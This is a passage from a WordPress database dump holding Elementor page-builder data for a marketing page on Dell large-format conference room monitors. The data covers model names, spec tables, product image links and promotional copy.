team.<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"95edd1d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"542b068\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2c3e21d\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3a24ced\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"background_background\":\"classic\",\"background_color\":\"#f2f2f2\"},\"elements\":[{\"id\":\"c0cc680\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e29177f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"6295038\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\">C5519Q<\\/h2>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"8b359d5\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"051af0d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\">C5518QT<\\/h2>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"da22a76\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"a4304b8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\">C7017T<\\/h2>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"44f258e\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"4a78e3d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"132399f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"531c7ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a0<\\/p><p><img src=\\\"https:\\/\\/i.dell.com\\/is\\/image\\/DellContent\\/\\/content\\/dam\\/global-site-design\\/product_images\\/peripherals\\/output_devices\\/dell\\/monitors\\/c5519q\\/global_spi\\/monitor-c5519q-campaign-hero-504x350-ng.psd?fmt=jpg\\\" alt=\\\"C5519Q Monitor\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"76134a5\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"d51c658\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img src=\\\"https:\\/\\/i.dell.com\\/is\\/image\\/DellContent\\/\\/content\\/dam\\/global-site-design\\/product_images\\/peripherals\\/output_devices\\/dell\\/monitors\\/c_series\\/c5518qt\\/pdp\\/dell-monitor-c5518qt-pdp-03-v2.jpg?fmt=jpg\\\" alt=\\\"Dell Monitor C5518QT\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4560da4\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"19ac253\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a0<\\/p><p><img src=\\\"https:\\/\\/i.dell.com\\/is\\/image\\/DellContent\\/\\/content\\/dam\\/global-site-design\\/product_images\\/peripherals\\/output_devices\\/dell\\/monitors\\/c_series\\/c7017t\\/global_spi\\/dell-monitor-c7017t-black-right-usage-hero-504x350-ng.psd?fmt=png-alpha\\\" alt=\\\"Dell 70 (C7017t) Conference Room Monitor\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"df69254\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"7110fc9\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"38f6a9a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: right;\\\"><strong>Resolution<\\/strong><br \\/><strong>OptiPlex Micro Mounting via<\\/strong><br \\/><strong>Touch\\/Non-Touch<\\/strong><br \\/><strong>Image Size<\\/strong><br \\/><strong>Panel Type<\\/strong><br \\/><strong>Surface<\\/strong><br \\/><strong>Mount<\\/strong><br \\/><strong>Connectivity<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bc54c67\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0e720c0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>4K<br \\/>Optional bracket<br \\/>Non-touch<br \\/>54.6 in<br \\/>Vertical Alignment Glass<br \\/>Anti-glare<br \\/>Optional wall mount<br \\/>2x HDMI<br \\/>1x DisplayPort<br \\/>1x VGA<br \\/>4x USB<br \\/>1x Audio-In\\/-Out<br \\/>1x RS232<br \\/>1x RJ45<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"496feb0\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"3b3a4fe\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>4K<br \\/>PC slot<br \\/>20 points of touch<br \\/>54.6 in<br \\/>IPS Glass<br \\/>Anti-glare, Anti-smudge<br \\/>Optional wall mount<br \\/>3x HDMI<br \\/>1x DisplayPort<br \\/>1x VGA<br \\/>7x USB<br \\/>1x Audio-In\\/-Out<br \\/>1x RS232<br \\/>1x RJ45<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"32d0318\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"2186554\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Full HD<br \\/>Optional bracket<br \\/>10 points of touch<br \\/>69.5 in<br \\/>Vertical Alignment Glass<br \\/>Anti-glare, Anti-smudge<br \\/>Wall mount included<br \\/>3x HDMI<br \\/>1x DisplayPort<br \\/>1x VGA<br \\/>4x USB<br \\/>1x Audio-In\\/-Out<br \\/>1x RS232<br \\/>1x RJ45<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a7995cb\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"2e6862a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"3147a86\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: right;\\\"><strong>Mount<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a36ed2f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"f952d0d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Optional wall mount<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5dd861a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"17c56c2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Optional wall mount<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a4c7b0b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"98647d5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Wall mount included<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b54172e\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"a5d7418\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"9a5bdd1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8ed1991\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"15\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"566ed8d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"716c03c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"15\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"571af73\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"feb7900\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"15\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6f41ecd\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"background_background\":\"classic\",\"background_color\":\"#686868\"},\"elements\":[{\"id\":\"1593399\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"6add182\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"6ae25c2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\">C7520QT<\\/h2>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1ea23e3\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"b917ab9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\">C8618QT<\\/h2>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9debee7\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"36275c2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96cecb2\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"40a96dc\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"ed83b27\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"3418f13\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img src=\\\"https:\\/\\/i.dell.com\\/is\\/image\\/DellContent\\/\\/content\\/dam\\/global-site-design\\/product_images\\/peripherals\\/output_devices\\/dell\\/monitors\\/c_series\\/c7520qt\\/global_spi\\/ng\\/monitor-c7520qt-campaign-hero-504x350-ng.png?fmt=jpg\\\" alt=\\\"Dell 75 4K Interactive Touch Monitor: C7520QT\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"60e9977\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"587b761\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img src=\\\"https:\\/\\/i.dell.com\\/is\\/image\\/DellContent\\/\\/content\\/dam\\/global-site-design\\/product_images\\/peripherals\\/output_devices\\/dell\\/monitors\\/c_series\\/c8618qt\\/global_spi\\/monitor-c8618qt-black-right-usage-hero-504x350-ng.psd?fmt=jpg\\\" alt=\\\"Dell-C8618QT-Monitor \\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"360bdc1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8248f1d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e32e6e8\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"190bffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"277c65b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: right;\\\"><strong>Resolution<\\/strong><br \\/><strong>OptiPlex Micro Mounting via<\\/strong><br \\/><strong>Touch\\/Non-Touch<\\/strong><br \\/><strong>Image Size<\\/strong><br \\/><strong>Panel Type<\\/strong><br \\/><strong>Surface<\\/strong><br \\/><strong>Mount<\\/strong><br \\/><strong>Connectivity<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"73a6ea9\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"59088a1\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>4K<br \\/>PC slot<br \\/>20 points of touch<br \\/>75 in<br \\/>IPS Glass<br \\/>Anti-glare, Anti-smudge<br \\/>Optional wall mount<br \\/>3x HDMI<br \\/>1x DisplayPort<br \\/>1x VGA<br \\/>4x USB<br \\/>1x Audio-In\\/-Out<br \\/>1x RS232<br \\/>1x RJ45<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34c2543\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"f5d29f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>4K<br \\/>PC slot<br \\/>20 points of touch<br \\/>85.6 in<br \\/>IPS Glass<br \\/>Anti-glare, Anti-smudge<br \\/>Optional wall mount<br \\/>4x HDMI<br \\/>1x DisplayPort<br \\/>1x VGA<br \\/>7x USB<br \\/>1x Audio-In\\/-Out<br \\/>1x RS232<br \\/>1x RJ45<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d69a802\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"82bae14\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9ab178a\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"7df1615\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"fb249a3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: right;\\\"><strong>Mount<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1702232\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"501ba37\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Optional wall mount<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"47c9900\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"aa4df57\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Optional wall mount<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2fc8b78\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ca71f29\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b8e407f\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"cc014f5\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"ac0433b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"4de9045\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"15\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"39f02db\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"6deb4e3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"15\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6f2ef27\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"347f8a6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(8814,3683,'_edit_lock','1572926295:1'),(8815,3683,'_edit_last','1'),(8780,3676,'_elementor_css','a:5:{s:4:\"time\";i:1572314894;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(8797,3661,'_elementor_controls_usage','a:6:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:54;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:54;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:72;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:6:\"layout\";a:3:{s:12:\"_inline_size\";i:60;s:16:\"content_position\";i:10;s:5:\"align\";i:3;}}}}s:7:\"section\";a:3:{s:5:\"count\";i:32;s:15:\"control_percent\";i:0;s:8:\"controls\";a:2:{s:6:\"layout\";a:2:{s:14:\"section_layout\";a:3:{s:13:\"content_width\";i:1;s:6:\"layout\";i:1;s:16:\"content_position\";i:1;}s:17:\"section_structure\";a:1:{s:9:\"structure\";i:20;}}s:5:\"style\";a:1:{s:18:\"section_background\";a:2:{s:21:\"background_background\";i:5;s:16:\"background_color\";i:5;}}}}s:6:\"spacer\";a:3:{s:5:\"count\";i:10;s:15:\"control_percent\";i:1;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:14:\"section_spacer\";a:1:{s:5:\"space\";i:10;}}}}s:7:\"heading\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:2:{s:5:\"title\";i:1;s:5:\"align\";i:1;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:1:{s:11:\"title_color\";i:1;}}}}s:5:\"video\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:13:\"section_video\";a:2:{s:11:\"youtube_url\";i:1;s:8:\"autoplay\";i:1;}}}}}'),(8813,1451,'_elementor_css','a:6:{s:4:\"time\";i:1572463836;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:6:\"status\";s:5:\"empty\";i:0;s:0:\"\";s:3:\"css\";s:0:\"\";}'),(8793,3678,'_elementor_version','2.7.4'),(8794,3678,'_wp_page_template','template-fullwidth.php'),(8795,3678,'_elementor_data','[{\"id\":\"1428c7d\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":1600,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"10c0343\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":32.072},\"elements\":[{\"id\":\"c13c1a7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img src=\\\"https:\\/\\/i.dell.com\\/sites\\/csimages\\/Product_Imagery\\/all\\/LFD-franchisepage-responsive_02.jpg\\\" alt=\\\"Transform your meeting space\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"eaf7a1e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":67.928,\"content_position\":\"center\"},\"elements\":[{\"id\":\"c18c5e2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><h2>Transform your meeting space<\\/h2><\\/div><div>Dell, the world\\u2019s number one monitor brand, has the tools and technology you need to facilitate teamwork. With our open standards approach and\\u00a0wide variety of displays ranging from 55\\u201d to 86\\u201d, it\\u2019s easy to find and\\u00a0customize a solution\\u00a0that keeps your team engaged and lets your business thrive.<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a29589\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d94f107\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0d139f5\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"02b0460\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#f2f2f2\"},\"elements\":[{\"id\":\"23442a4\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\"},\"elements\":[{\"id\":\"4c2a77c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 class=\\\"text-dark-red\\\" style=\\\"text-align: center;\\\" data-testid=\\\"producthero_module_title\\\">Maximize your team\\u2019s productivity<\\/h2><div class=\\\"top-offset-small bottom-offset-small text-dark-red\\\" style=\\\"text-align: center;\\\" data-testid=\\\"producthero_module_subtitle\\\">Make meetings more efficient with our collaboration-enhancing features and easy connectivity.<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2222c78\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"a87a431\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img src=\\\"https:\\/\\/i.dell.com\\/sites\\/csimages\\/Product_Imagery\\/all\\/LFD-franchisepage-responsive_03.jpg\\\" alt=\\\"Maximize your team\\u2019s productivity\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"df1a833\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"229d78d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f465b01\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6dddbc3\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"ad2406f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":29.64},\"elements\":[{\"id\":\"f0cdfa8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"alignright\\\" src=\\\"https:\\/\\/i.dell.com\\/sites\\/csimages\\/Product_Imagery\\/all\\/LFD-franchisepage-responsive_04.jpg\\\" alt=\\\"Next-level teamwork\\\" width=\\\"347\\\" height=\\\"256\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"de8bd10\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":70.36,\"content_position\":\"bottom\"},\"elements\":[{\"id\":\"de42688\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><h2>Next-level teamwork<\\/h2><\\/div><div><strong>More ways to interact:<\\/strong>\\u00a0Group collaboration is more seamless and intuitive than ever with our interactive monitors<a class=\\\"technote microcontent\\\" rel=\\\"technotes:available-monitors\\\">*<\\/a>. And, a simple touch of your hand or swipe of a stylus allows you to experience real-time interaction with virtually zero lag.<br \\/><br \\/><\\/div><div><p><strong>Collaboration solutions:<\\/strong>\\u00a0Annotate, collaborate and whiteboard with included software like DisplayNote and FlatFrog<a class=\\\"technote microcontent\\\" rel=\\\"technotes:available-monitors\\\">*<\\/a>.<br \\/><br \\/><strong>Collaboration for all:<\\/strong>\\u00a0Dell Screen Drop feature<a class=\\\"technote microcontent\\\" rel=\\\"technotes:available-monitors\\\">*<\\/a>\\u00a0lets you lower the displayed image so that it\\u2019s easy to reach, with touch sensors on either side of the display for three additional height settings to fit people working from varying heights.<\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5029420\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"b8e6817\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"29544d8\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"01f3af0\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"f845c7d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\"},\"elements\":[{\"id\":\"6933422\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><h2>Captivate your audience<\\/h2><\\/div><div><ul><li><strong>Make the most of your meeting:<\\/strong>\\u00a0With a wide variety of connectivity options, you can quickly connect to the display and seamlessly switch between presenters, allowing your audience to enjoy a smooth and continuous presentation.<\\/li><\\/ul><ul><li><strong>Present crisply and clearly:<\\/strong>\\u00a0Monitor scaling technology allows you to capture your audience\\u2019s attention with exceptionally clear text and vivid visuals.<\\/li><\\/ul><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7a70680\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"670e9e1\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/i.dell.com\\/sites\\/csimages\\/Product_Imagery\\/all\\/LFD-franchisepage-responsive_05.jpg\\\" alt=\\\"Captivate your audience\\\" width=\\\"360\\\" height=\\\"267\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a4b5b73\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0df3684\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"bb72a42\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"67af6a3\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"content_position\":\"middle\"},\"elements\":[{\"id\":\"1823f82\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"content_position\":\"center\",\"align\":\"center\"},\"elements\":[{\"id\":\"2c8aa0a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Dell Large Format Monitors\",\"align\":\"center\",\"title_color\":\"#353535\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73d6a89\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c4bd9f7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2816dd3\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=Z98yJnbXWq8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\",\"autoplay\":\"yes\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"746f096\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0102d24\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"249ca4a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d291a0\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#f2f2f2\"},\"elements\":[{\"id\":\"6228508\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\"},\"elements\":[{\"id\":\"7c029ba\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 class=\\\"text-dark-red\\\" style=\\\"text-align: center;\\\" data-testid=\\\"producthero_module_title\\\">Flexible IT solutions<\\/h2><div 